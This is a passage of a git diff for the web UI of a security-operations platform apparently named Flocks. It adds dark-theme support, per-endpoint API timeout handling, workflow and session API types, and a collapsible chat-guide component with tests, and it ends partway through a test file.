+    { url = "https://files.pythonhosted.org/packages/6a/3e/b68c118422ec867fa7ab88444e1274aa40681c606d59ac27de5a5588f082/python_dotenv-1.0.1-py3-none-any.whl", hash = "sha256:f7b63ef50f1b690dddf550d03497b66d609393b40b564ed0d674909a68ebf16a", size = 19863, upload-time = "2024-01-23T06:32:58.246Z" },
 ]
 
 [[package]]
@@ -2308,7 +2308,7 @@ wheels = [
 
 [[package]]
 name = "typer"
-version = "0.24.1"
+version = "0.23.1"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "annotated-doc" },
@@ -2316,9 +2316,9 @@ dependencies = [
     { name = "rich" },
     { name = "shellingham" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/f5/24/cb09efec5cc954f7f9b930bf8279447d24618bb6758d4f6adf2574c41780/typer-0.24.1.tar.gz", hash = "sha256:e39b4732d65fbdcde189ae76cf7cd48aeae72919dea1fdfc16593be016256b45", size = 118613, upload-time = "2026-02-21T16:54:40.609Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/fd/07/b822e1b307d40e263e8253d2384cf98c51aa2368cc7ba9a07e523a1d964b/typer-0.23.1.tar.gz", hash = "sha256:2070374e4d31c83e7b61362fd859aa683576432fd5b026b060ad6b4cd3b86134", size = 120047, upload-time = "2026-02-13T10:04:30.984Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/4a/91/48db081e7a63bb37284f9fbcefda7c44c277b18b0e13fbc36ea2335b71e6/typer-0.24.1-py3-none-any.whl", hash = "sha256:112c1f0ce578bfb4cab9ffdabc68f031416ebcc216536611ba21f04e9aa84c9e", size = 56085, upload-time = "2026-02-21T16:54:41.616Z" },
+    { url = "https://files.pythonhosted.org/packages/d5/91/9b286ab899c008c2cb05e8be99814807e7fbbd33f0c0c960470826e5ac82/typer-0.23.1-py3-none-any.whl", hash = "sha256:3291ad0d3c701cbf522012faccfbb29352ff16ad262db2139e6b01f15781f14e", size = 56813, upload-time = "2026-02-13T10:04:32.008Z" },
 ]
 
 [[package]]
diff --git a/webui/index.html b/webui/index.html
index ac6bcb34c..c5a921e2d 100644
--- a/webui/index.html
+++ b/webui/index.html
@@ -5,6 +5,22 @@
     <link rel="icon" type="image/svg+xml" href="/favicon.svg" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>Flocks - AI Native SecOps Platform</title>
+    <script>
+      (function () {
+        try {
+          var theme = localStorage.getItem('flocks_theme');
+          var prefersDark = window.matchMedia('(prefers-color-scheme: dark)').matches;
+          if (theme === 'dark' || (!theme && prefersDark)) {
+            document.documentElement.classList.add('dark');
+            document.documentElement.style.colorScheme = 'dark';
+          } else {
+            document.documentElement.style.colorScheme = 'light';
+          }
+        } catch (error) {
+          document.documentElement.style.colorScheme = 'light';
+        }
+      })();
+    </script>
   </head>
   <body>
     <div id="root"></div>
diff --git a/webui/src/App.tsx b/webui/src/App.tsx
index c7a1f44a9..21613e02a 100644
--- a/webui/src/App.tsx
+++ b/webui/src/App.tsx
@@ -4,17 +4,20 @@ import { ToastProvider } from './components/common/Toast'
 import { ConfirmProvider } from './components/common/ConfirmDialog'
 import { BackendStatusBanner } from './components/common/BackendStatusBanner'
 import { AuthProvider } from './contexts/AuthContext'
+import { ThemeProvider } from './contexts/ThemeContext'
 
 export default function App() {
   return (
     <ToastProvider>
       <ConfirmProvider>
-        <BrowserRouter>
-          <AuthProvider>
-            <BackendStatusBanner />
-            <Routes />
-          </AuthProvider>
-        </BrowserRouter>
+        <ThemeProvider>
+          <BrowserRouter>
+            <AuthProvider>
+              <BackendStatusBanner />
+              <Routes />
+            </AuthProvider>
+          </BrowserRouter>
+        </ThemeProvider>
       </ConfirmProvider>
     </ToastProvider>
   )
diff --git a/webui/src/api/client.test.ts b/webui/src/api/client.test.ts
index 0e5dad403..a8050008c 100644
--- a/webui/src/api/client.test.ts
+++ b/webui/src/api/client.test.ts
@@ -1,5 +1,5 @@
 import { describe, expect, it } from 'vitest';
-import { resolveApiBaseURL } from './client';
+import { resolveApiBaseURL, shouldDisableApiTimeout } from './client';
 
 describe('resolveApiBaseURL', () => {
   it('returns the configured URL when no current origin is provided', () => {
@@ -19,3 +19,30 @@ describe('resolveApiBaseURL', () => {
     expect(resolveApiBaseURL('http://10.0.0.8:8000', 'http://localhost:5173')).toBe('http://10.0.0.8:8000');
   });
 });
+
+describe('shouldDisableApiTimeout', () => {
+  it('disables timeout for session interaction mutations', () => {
+    expect(shouldDisableApiTimeout('/api/session', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/message', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_async', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1', 'patch')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1', 'delete')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1/run_now', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/command', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/abort', 'post')).toBe(true);
+  });
+
+  it('disables timeout for question replies and rejects', () => {
+    expect(shouldDisableApiTimeout('/api/question/question-1/reply', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/question/question-1/reject', 'post')).toBe(true);
+  });
+
+  it('keeps timeout for normal read endpoints', () => {
+    expect(shouldDisableApiTimeout('/api/session', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/session/sess-1', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/message', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/question/session/sess-1/pending', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/workflow', 'post')).toBe(false);
+  });
+});
diff --git a/webui/src/api/client.ts b/webui/src/api/client.ts
index 2138272dd..c3970fdc1 100644
--- a/webui/src/api/client.ts
+++ b/webui/src/api/client.ts
@@ -1,5 +1,7 @@
 import axios from 'axios';
 
+export const DEFAULT_API_TIMEOUT_MS = 30000;
+
 function isLoopbackHostname(hostname: string): boolean {
   return hostname === 'localhost' || hostname === '127.0.0.1' || hostname === '::1';
 }
@@ -37,17 +39,55 @@ const baseURL = resolveApiBaseURL(
 
 export const apiClient = axios.create({
   baseURL,
-  timeout: 30000, // 30 seconds - 缩短超时时间以更快发现连接问题
+  timeout: DEFAULT_API_TIMEOUT_MS, // 30 seconds - 缩短超时时间以更快发现连接问题
   withCredentials: true,
   headers: {
     'Content-Type': 'application/json',
   },
 });
 
+export function shouldDisableApiTimeout(url?: string, method?: string): boolean {
+  if (!url) return false;
+
+  const normalizedMethod = (method || 'get').toLowerCase();
+  const path = (() => {
+    try {
+      return new URL(url, 'http://flocks.local').pathname;
+    } catch {
+      return url.split('?')[0] || url;
+    }
+  })();
+
+  if (normalizedMethod === 'post' && path === '/api/session') {
+    return true;
+  }
+
+  if (path.startsWith('/api/session/')) {
+    return (
+      ['post', 'patch', 'delete'].includes(normalizedMethod) &&
+      (
+        path.endsWith('/message') ||
+        path.endsWith('/prompt_async') ||
+        path.includes('/prompt_queue') ||
+        path.endsWith('/command') ||
+        path.endsWith('/abort')
+      )
+    );
+  }
+
+  if (normalizedMethod === 'post' && path.startsWith('/api/question/')) {
+    return path.endsWith('/reply') || path.endsWith('/reject');
+  }
+
+  return false;
+}
+
 // 请求拦截器
 apiClient.interceptors.request.use(
   (config) => {
-    // 可以在这里添加认证 token 等
+    if (shouldDisableApiTimeout(config.url, config.method)) {
+      config.timeout = 0;
+    }
     return config;
   },
   (error) => {
diff --git a/webui/src/api/device.ts b/webui/src/api/device.ts
index ad0ba1e26..1944c58ce 100644
--- a/webui/src/api/device.ts
+++ b/webui/src/api/device.ts
@@ -91,6 +91,8 @@ export interface DeviceTestResult {
 }
 
 export interface DeviceTestRequest {
+  /** Unsaved form fields used only for this probe. */
+  fields?: Record<string, string>;
   /** Override the persisted base_url for this probe only (typically the
    *  current value in the form, before it has been saved). */
   base_url?: string;
@@ -173,6 +175,9 @@ export const deviceAPI = {
   listTemplates: (params?: { refresh?: boolean }) =>
     client.get<DeviceTemplate[]>('/api/devices/templates', { params }),
 
+  sync: (params?: { refresh?: boolean }) =>
+    client.post<{ created: number }>('/api/devices/sync', null, { params }),
+
   createCustomTemplate: (data: CustomDeviceTemplateCreate) =>
     client.post<DeviceTemplate>('/api/devices/templates/custom', data),
 
diff --git a/webui/src/api/session.ts b/webui/src/api/session.ts
index 9565d4f82..0123d0f44 100644
--- a/webui/src/api/session.ts
+++ b/webui/src/api/session.ts
@@ -20,6 +20,8 @@ export interface QueuedPrompt {
   agent?: string | null;
   model?: Record<string, unknown> | null;
   variant?: string | null;
+  display_text?: string | null;
+  displayText?: string | null;
   messageID?: string | null;
   status: 'pending' | 'executing' | string;
   createdAt: number;
@@ -31,6 +33,41 @@ export interface PromptQueueResponse {
   items: QueuedPrompt[];
 }
 
+export interface ContextUsageSegment {
+  key: string;
+  tokens: number;
+  included: boolean;
+  source?: 'observed' | 'estimated' | string;
+}
+
+export interface ContextUsageSnapshot {
+  sessionID: string;
+  usedTokens: number;
+  contextWindow: number;
+  percent: number;
+  source: 'observed' | 'estimated' | string;
+  lastMessageID?: string | null;
+  observedTokens?: number | null;
+  estimatedTokens: number;
+  compactedTokens: number;
+  providerID?: string | null;
+  modelID?: string | null;
+  segments: ContextUsageSegment[];
+  excludedSegments: ContextUsageSegment[];
+}
+
+export interface SessionGoalState {
+  status: 'active' | 'completed' | 'blocked' | 'paused';
+  objective: string;
+  reason?: string | null;
+}
+
+export interface SessionResponse {
+  id: string;
+  goal?: SessionGoalState | null;
+  [key: string]: unknown;
+}
+
 export interface SessionListParams {
   limit?: number;
   offset?: number;
@@ -61,7 +98,7 @@ export const sessionApi = {
   /**
    * 获取单个会话
    */
-  get: async (sessionId: string) => {
+  get: async (sessionId: string): Promise<SessionResponse> => {
     const response = await client.get(`/api/session/${sessionId}`);
     return response.data;
   },
@@ -122,6 +159,11 @@ export const sessionApi = {
     return response.data;
   },
 
+  getContextUsage: async (sessionId: string): Promise<ContextUsageSnapshot> => {
+    const response = await client.get(`/api/session/${sessionId}/context-usage`);
+    return response.data;
+  },
+
   /**
    * 发送消息
    */
@@ -145,6 +187,7 @@ export const sessionApi = {
     agent?: string;
     model?: Record<string, unknown>;
     variant?: string;
+    displayText?: string;
   }) => {
     const response = await client.post(`/api/session/${sessionId}/prompt_queue`, data);
     return response.data;
diff --git a/webui/src/api/skill.ts b/webui/src/api/skill.ts
index b21c1b583..8537aa8c6 100644
--- a/webui/src/api/skill.ts
+++ b/webui/src/api/skill.ts
@@ -23,6 +23,7 @@ export interface Skill {
   source?: string;
   content?: string;
   category?: string;
+  ui_hidden?: boolean;
   disabled?: boolean;
   // Eligibility
   eligible?: boolean;
diff --git a/webui/src/api/workflow.ts b/webui/src/api/workflow.ts
index 8d4eecd48..b081435f9 100644
--- a/webui/src/api/workflow.ts
+++ b/webui/src/api/workflow.ts
@@ -163,6 +163,7 @@ export interface WorkflowTriggerPlugin {
 export interface WorkflowJSON {
   version?: string;
   name?: string;
+  nameI18n?: Record<string, string>;
   start: string;
   nodes: WorkflowNode[];
   edges: WorkflowEdge[];
@@ -173,8 +174,10 @@ export interface WorkflowJSON {
 export interface Workflow {
   id: string;
   name: string;
+  nameI18n?: Record<string, string>;
   description?: string;
   markdownContent?: string;
+  editMarkdownContent?: string;
   category: string;
   workflowJson: WorkflowJSON;
   status: 'draft' | 'active' | 'archived';
@@ -225,6 +228,18 @@ export interface WorkflowExecution {
   currentNodeType?: string;
   currentPhase?: string;
   currentStepIndex?: number;
+  stepCount?: number;
+  stepLogOffset?: number;
+  stepLogLimit?: number;
+  stepLogTotal?: number;
+  loopProgress?: {
+    loop_node_id?: string;
+    iteration?: number;
+    total_iterations?: number;
+    current_item?: string;
+    current_inner_node_id?: string;
+    global_step_index?: number;
+  };
 }
 
 export interface WorkflowNodeExecution {
@@ -251,6 +266,35 @@ export interface WorkflowService {
 
 export type WorkflowServiceDriver = 'local' | 'docker';
 
+export interface WorkflowIntegrationConfig {
+  version: number;
+  kind: string;
+  workflow: {
+    id: string;
+    name?: string;
+    category?: string;
+    source?: string;
+  };
+  updatedAt: number;
+  publish: Record<string, any>;
+  triggers: WorkflowTrigger[];
+  [key: string]: any;
+}
+
+export interface WorkflowIntegrationConfigResponse {
+  ok?: boolean;
+  exists?: boolean;
+  path: string;
+  storageKey?: string;
+  source?: 'storage' | 'file_migrated' | 'generated' | string;
+  config: WorkflowIntegrationConfig;
+  runtime?: {
+    publish?: Record<string, any>;
+    triggers?: WorkflowTriggerRecord[];
+    [key: string]: any;
+  };
+}
+
 /** Saved syslog listener config (per workflow). */
 export interface SyslogConfig {
   workflowId?: string;
@@ -303,6 +347,7 @@ export interface WorkflowPollerConfig {
   workflowId?: string;
   enabled?: boolean;
   intervalSeconds?: number;
+  cronExpression?: string | null;
   timeoutSeconds?: number;
   noOverlap?: boolean;
   inputs?: Record<string, any>;
@@ -353,6 +398,8 @@ export const workflowAPI = {
     description?: string;
     category?: string;
     workflowJson?: WorkflowJSON;
+    markdownContent?: string;
+    editMarkdownContent?: string;
     status?: 'draft' | 'active' | 'archived';
   }) =>
     client.put<Workflow>(`/api/workflow/${id}`, data),
@@ -373,8 +420,12 @@ export const workflowAPI = {
   getHistory: (id: string, params?: { limit?: number; triggerId?: string; triggerType?: string }) =>
     client.get<WorkflowExecution[]>(`/api/workflow/${id}/history`, { params }),
   
-  getExecution: (workflowId: string, execId: string) =>
-    client.get<WorkflowExecution>(`/api/workflow/${workflowId}/history/${execId}`),
+  getExecution: (
+    workflowId: string,
+    execId: string,
+    params?: { stepOffset?: number; stepLimit?: number },
+  ) =>
+    client.get<WorkflowExecution>(`/api/workflow/${workflowId}/history/${execId}`, { params }),
 
   cancelExecution: (workflowId: string, execId: string) =>
     client.post<{ status: string; message: string; executionId: string }>(
@@ -394,7 +445,7 @@ export const workflowAPI = {
     client.get<WorkflowJSON>(`/api/workflow/${id}/export`),
 
   publish: (id: string, data?: { driver?: WorkflowServiceDriver }) =>
-    client.post<WorkflowService>(`/api/workflow/${id}/publish`, data, { timeout: 300000 }),
+    client.post<WorkflowService>(`/api/workflow/${id}/publish`, data, { timeout: 600000 }),
 
   unpublish: (id: string) =>
     client.post<{ ok: boolean }>(`/api/workflow/${id}/unpublish`),
@@ -402,6 +453,18 @@ export const workflowAPI = {
   getService: (id: string) =>
     client.get<WorkflowService | null>(`/api/workflow/${id}/service`),
 
+  deleteService: (id: string) =>
+    client.delete<{ ok: boolean; workflowId: string }>(`/api/workflow/${id}/service`),
+
+  getConfig: (id: string) =>
+    client.get<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config`),
+
+  updateConfig: (id: string, config: WorkflowIntegrationConfig) =>
+    client.put<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config`, config),
+
+  syncConfig: (id: string) =>
+    client.post<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config/sync`),
+
   listServices: () =>
     client.get<WorkflowService[]>('/api/workflow-services'),
 
@@ -508,3 +571,43 @@ export const workflowAPI = {
   saveSampleInputs: (id: string, sampleInputs: Record<string, any>) =>
     client.post<{ ok: boolean }>(`/api/workflow/${id}/sample-inputs`, { sampleInputs }),
 };
+
+export function workflowAPIEndpoints(id: string, triggerId = '{triggerId}') {
+  const workflowBase = `/api/workflow/${id}`;
+  const triggerBase = `${workflowBase}/triggers`;
+  const triggerRecord = `${triggerBase}/${triggerId}`;
+
+  return {
+    config: {
+      read: `GET ${workflowBase}/config`,
+      write: `PUT ${workflowBase}/config`,
+      syncFallback: `POST ${workflowBase}/config/sync`,
+    },
+    apiService: {
+      read: `GET ${workflowBase}/service`,
+      publish: `POST ${workflowBase}/publish`,
+      unpublish: `POST ${workflowBase}/unpublish`,
+      delete: `DELETE ${workflowBase}/service`,
+    },
+    triggers: {
+      list: `GET ${triggerBase}`,
+      create: `POST ${triggerBase}`,
+      update: `PUT ${triggerRecord}`,
+      delete: `DELETE ${triggerRecord}`,
+      status: `GET ${triggerRecord}/status`,
+      previewMapping: `POST ${triggerRecord}/preview-mapping`,
+      test: `POST ${triggerRecord}/test`,
+      invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+      plugins: 'GET /api/workflow-trigger-plugins',
+    },
+    legacyAdapters: {
+      kafkaConfig: `GET/POST ${workflowBase}/kafka-config`,
+      kafkaStatus: `GET ${workflowBase}/kafka-status`,
+      pollerConfig: `GET/POST ${workflowBase}/poller-config`,
+      pollerStatus: `GET ${workflowBase}/poller-status`,
+      pollerRunOnce: `POST ${workflowBase}/poller-run-once`,
+      syslogConfig: `GET/POST ${workflowBase}/syslog-config`,
+      syslogStatus: `GET ${workflowBase}/syslog-status`,
+    },
+  };
+}
diff --git a/webui/src/components/common/BackendStatusBanner.tsx b/webui/src/components/common/BackendStatusBanner.tsx
index cd93ed47f..9da1d55b2 100644
--- a/webui/src/components/common/BackendStatusBanner.tsx
+++ b/webui/src/components/common/BackendStatusBanner.tsx
@@ -13,13 +13,13 @@ export function BackendStatusBanner() {
   const getBannerStyle = () => {
     switch (status) {
       case 'connecting':
-        return 'bg-yellow-50 border-yellow-200 text-yellow-800';
+        return 'bg-yellow-50 border-yellow-200 text-yellow-800 dark:border-amber-500/35 dark:bg-amber-500/15 dark:text-amber-100';
       case 'disconnected':
-        return 'bg-red-50 border-red-200 text-red-800';
+        return 'bg-red-50 border-red-200 text-red-800 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-100';
       case 'error':
-        return 'bg-red-50 border-red-200 text-red-800';
+        return 'bg-red-50 border-red-200 text-red-800 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-100';
       default:
-        return 'bg-gray-50 border-gray-200 text-gray-800';
+        return 'bg-gray-50 border-gray-200 text-gray-800 dark:border-[#4a5563] dark:bg-[#303842] dark:text-[#d7dee8]';
     }
   };
 
@@ -72,7 +72,7 @@ export function BackendStatusBanner() {
           
           <button
             onClick={checkHealth}
-            className="px-4 py-2 bg-white/50 hover:bg-white/80 rounded-lg text-sm font-medium transition-colors duration-200 flex items-center space-x-2"
+            className="px-4 py-2 bg-white/50 hover:bg-white/80 rounded-lg text-sm font-medium transition-colors duration-200 flex items-center space-x-2 dark:bg-[#46515e]/70 dark:hover:bg-[#5a6573]"
           >
             <RefreshCw className="w-4 h-4" />
             <span>{t('backend.retry')}</span>
diff --git a/webui/src/components/common/ChatGuideDock.test.tsx b/webui/src/components/common/ChatGuideDock.test.tsx
new file mode 100644
index 000000000..2976ff0e4
--- /dev/null
+++ b/webui/src/components/common/ChatGuideDock.test.tsx
@@ -0,0 +1,89 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import ChatGuideDock, { type ChatGuideAction } from './ChatGuideDock';
+
+const actions: ChatGuideAction[] = Array.from({ length: 6 }, (_item, index) => ({
+  label: `Guide ${index + 1}`,
+  description: `Description ${index + 1}`,
+  prompt: `Prompt ${index + 1}`,
+  group: index < 3 ? 'Create Guides' : 'Create Cases',
+}));
+
+describe('ChatGuideDock', () => {
+  it('keeps guides in a compact rail and expands upward to a full guide panel', async () => {
+    const user = userEvent.setup();
+    const onStartPrompt = vi.fn();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={onStartPrompt}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: 'Guide 1' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Guide 5' })).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: 'Guide 6' })).not.toBeInTheDocument();
+    expect(screen.queryByTestId('chat-guide-expanded-panel')).not.toBeInTheDocument();
+
+    const expandButton = screen.getByRole('button', { name: /Expand guide/ });
+    expect(expandButton).toHaveAttribute('aria-expanded', 'false');
+
+    await user.click(expandButton);
+
+    expect(screen.getByTestId('chat-guide-expanded-panel')).toBeInTheDocument();
+    expect(screen.getByText('Create Guides')).toBeInTheDocument();
+    expect(screen.getByText('Create Cases')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Guide 6' }).parentElement?.parentElement).toHaveClass(
+      'grid-cols-[repeat(auto-fill,minmax(140px,1fr))]',
+    );
+    expect(screen.getByRole('button', { name: 'Guide 6' })).toBeInTheDocument();
+    expect(expandButton).toHaveAttribute('aria-expanded', 'true');
+
+    await user.click(screen.getByRole('button', { name: 'Guide 6' }));
+
+    expect(onStartPrompt).toHaveBeenCalledWith('Prompt 6', 'Guide 6');
+  });
+
+  it('keeps a left-side collapse control for the guide rail', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: 'Collapse guide' }));
+
+    expect(screen.queryByRole('button', { name: 'Guide 1' })).not.toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Expand guide' })).toHaveAttribute('aria-expanded', 'false');
+  });
+
+  it('closes the expanded panel when clicking outside the guide dock', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /Expand guide/ }));
+    expect(screen.getByTestId('chat-guide-expanded-panel')).toBeInTheDocument();
+
+    await user.click(document.body);
+
+    expect(screen.queryByTestId('chat-guide-expanded-panel')).not.toBeInTheDocument();
+  });
+});
diff --git a/webui/src/components/common/ChatGuideDock.tsx b/webui/src/components/common/ChatGuideDock.tsx
new file mode 100644
index 000000000..9c73816af
--- /dev/null
+++ b/webui/src/components/common/ChatGuideDock.tsx
@@ -0,0 +1,172 @@
+import { useEffect, useRef, useState } from 'react';
+import { ChevronUp, ChevronsLeft, ChevronsRight } from 'lucide-react';
+import GuideInfoIcon from './GuideInfoIcon';
+
+export interface ChatGuideAction {
+  label: string;
+  description: string;
+  prompt: string;
+  group?: string;
+}
+
+interface ChatGuideDockProps {
+  actions: ChatGuideAction[];
+  disabled?: boolean;
+  collapseTitle: string;
+  expandTitle: string;
+  onStartPrompt: (prompt: string, label: string) => void;
+}
+
+const RAIL_ACTION_LIMIT = 5;
+
+function groupGuideActions(actions: ChatGuideAction[]) {
+  const groups: Array<{ title: string; actions: ChatGuideAction[] }> = [];
+
+  for (const action of actions) {
+    const title = action.group?.trim() || '';
+    let group = groups.find((item) => item.title === title);
+    if (!group) {
+      group = { title, actions: [] };
+      groups.push(group);
+    }
+    group.actions.push(action);
+  }
+
+  return groups;
+}
+
+export default function ChatGuideDock({
+  actions,
+  disabled,
+  collapseTitle,
+  expandTitle,
+  onStartPrompt,
+}: ChatGuideDockProps) {
+  const rootRef = useRef<HTMLDivElement>(null);
+  const [collapsed, setCollapsed] = useState(false);
+  const [panelOpen, setPanelOpen] = useState(false);
+
+  const hasOverflowActions = actions.length > RAIL_ACTION_LIMIT;
+  const railActions = actions.slice(0, RAIL_ACTION_LIMIT);
+  const actionGroups = groupGuideActions(actions);
+  const shouldShowGroupTitle = actionGroups.some((group) => group.title);
+
+  const handleStartPrompt = (action: ChatGuideAction) => {
+    setPanelOpen(false);
+    onStartPrompt(action.prompt, action.label);
+  };
+
+  useEffect(() => {
+    if (!panelOpen || collapsed) return undefined;
+
+    const handlePointerDown = (event: PointerEvent) => {
+      const target = event.target;
+      if (!(target instanceof Node) || rootRef.current?.contains(target)) return;
+      setPanelOpen(false);
+    };
+
+    document.addEventListener('pointerdown', handlePointerDown);
+    return () => {
+      document.removeEventListener('pointerdown', handlePointerDown);
+    };
+  }, [collapsed, panelOpen]);
+
+  if (actions.length === 0) return null;
+
+  const renderActionButton = (action: ChatGuideAction, variant: 'rail' | 'panel') => (
+    <div
+      key={action.label}
+      className={`group inline-flex h-8 max-w-full items-center rounded-lg border border-zinc-200 bg-white text-zinc-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600 ${
+        variant === 'rail' ? 'flex-shrink-0' : 'min-w-0'
+      }`}
+    >
+      <button
+        type="button"
+        disabled={disabled}
+        onClick={() => handleStartPrompt(action)}
+        className="flex h-full min-w-0 flex-1 items-center truncate whitespace-nowrap rounded-l-lg pl-2.5 pr-1 text-left text-xs font-semibold leading-none disabled:cursor-not-allowed disabled:opacity-50"
+      >
+        {action.label}
+      </button>
+      <GuideInfoIcon label={action.label} description={action.description} />
+    </div>
+  );
+
+  return (
+    <div ref={rootRef} className="relative flex w-full min-w-0 items-stretch gap-1.5">
+      {panelOpen && !collapsed && (
+        <div
+          data-testid="chat-guide-expanded-panel"
+          className="absolute bottom-full left-0 right-0 z-30 mb-2 h-56 max-h-[calc(100vh-12rem)] overflow-hidden rounded-xl border border-zinc-200 bg-white/95 p-2 shadow-lg backdrop-blur"
+        >
+          <div className="flex h-full flex-col gap-3 overflow-y-auto pr-1 [scrollbar-width:thin] [scrollbar-color:#d4d4d8_transparent] dark:[scrollbar-color:#545d68_transparent]">
+            {actionGroups.map((group, groupIndex) => (
+              <section key={group.title || `group-${groupIndex}`} className="min-w-0">
+                {shouldShowGroupTitle && group.title && (
+                  <div className="mb-1.5 px-1 text-[11px] font-semibold leading-none text-zinc-400">
+                    {group.title}
+                  </div>
+                )}
+                <div className="grid grid-cols-[repeat(auto-fill,minmax(140px,1fr))] gap-1.5">
+                  {group.actions.map((action) => renderActionButton(action, 'panel'))}
+                </div>
+              </section>
+            ))}
+          </div>
+        </div>
+      )}
+
+      <button
+        type="button"
+        onClick={() => {
+          setCollapsed((value) => {
+            const next = !value;
+            if (next) setPanelOpen(false);
+            return next;
+          });
+        }}
+        className="flex h-8 w-8 flex-shrink-0 items-center justify-center rounded-lg border border-zinc-200 bg-white text-zinc-400 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-500"
+        title={collapsed ? expandTitle : collapseTitle}
+        aria-label={collapsed ? expandTitle : collapseTitle}
+        aria-expanded={!collapsed}
+      >
+        {collapsed ? <ChevronsRight className="h-3.5 w-3.5" /> : <ChevronsLeft className="h-3.5 w-3.5" />}
+      </button>
+
+      <div
+        className={`min-w-0 flex-1 overflow-x-auto overflow-y-hidden pr-1 transition-all duration-200 [scrollbar-width:none] [&::-webkit-scrollbar]:hidden ${
+          collapsed ? 'basis-0 max-w-0 opacity-0 pointer-events-none' : 'basis-auto max-w-full opacity-100'
+        }`}
+        onWheel={(event) => {
+          const delta = Math.abs(event.deltaX) > Math.abs(event.deltaY)
+            ? event.deltaX
+            : event.deltaY;
+          if (delta === 0) return;
+          event.currentTarget.scrollLeft += delta;
+          event.preventDefault();
+        }}
+      >
+        <div className="flex w-max gap-1.5">
+          {!collapsed && railActions.map((action) => renderActionButton(action, 'rail'))}
+        </div>
+      </div>
+
+      {hasOverflowActions && !collapsed && (
+        <button
+          type="button"
+          onClick={() => setPanelOpen((value) => !value)}
+          className={`inline-flex h-8 w-8 flex-shrink-0 items-center justify-center rounded-lg border bg-white transition-colors ${
+            panelOpen
+              ? 'border-rose-200 text-rose-500'
+              : 'border-zinc-200 text-zinc-400 hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-500'
+          }`}
+          title={panelOpen ? collapseTitle : expandTitle}
+          aria-label={panelOpen ? collapseTitle : expandTitle}
+          aria-expanded={panelOpen}
+        >
+          <ChevronUp className={`h-3.5 w-3.5 transition-transform ${panelOpen ? 'rotate-180' : ''}`} />
+        </button>
+      )}
+    </div>
+  );
+}
diff --git a/webui/src/components/common/ChatPromptSelectors.test.tsx b/webui/src/components/common/ChatPromptSelectors.test.tsx
new file mode 100644
index 000000000..147ad560c
--- /dev/null
+++ b/webui/src/components/common/ChatPromptSelectors.test.tsx
@@ -0,0 +1,64 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import { ChatModelPicker, type ChatModelProviderGroup } from './ChatPromptSelectors';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'modelPicker.title': '选择模型',
+        'modelPicker.hint': '作为本次对话发送时的模型覆盖',
+        'modelPicker.empty': '暂无模型',
+        'modelPicker.count': `${params?.count ?? 0}`,
+        'modelPicker.vision': '视觉',
+        loading: '加载中',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+const groupedOptions: ChatModelProviderGroup[] = [
+  {
+    providerID: 'minimax',
+    providerName: 'Minimax',
+    models: [
+      {
+        key: 'minimax::minimax-m3',
+        providerID: 'minimax',
+        providerName: 'Minimax',
+        modelID: 'minimax-m3',
+        label: 'minimax-m3',
+        pricingLabel: 'free',
+        contextLabel: '128k',
+        contextWindowTokens: 128000,
+        supportsVision: false,
+      },
+    ],
+  },
+];
+
+describe('ChatModelPicker', () => {
+  it('opens the model menu toward the left edge of the trigger', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatModelPicker
+        groupedOptions={groupedOptions}
+        loading={false}
+        selectedModelOption={groupedOptions[0].models[0]}
+        onSelectModel={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /minimax-m3/i }));
+
+    const menu = screen.getByText('选择模型').closest('.absolute');
+    expect(menu).not.toBeNull();
+    expect(menu).toHaveClass('right-0');
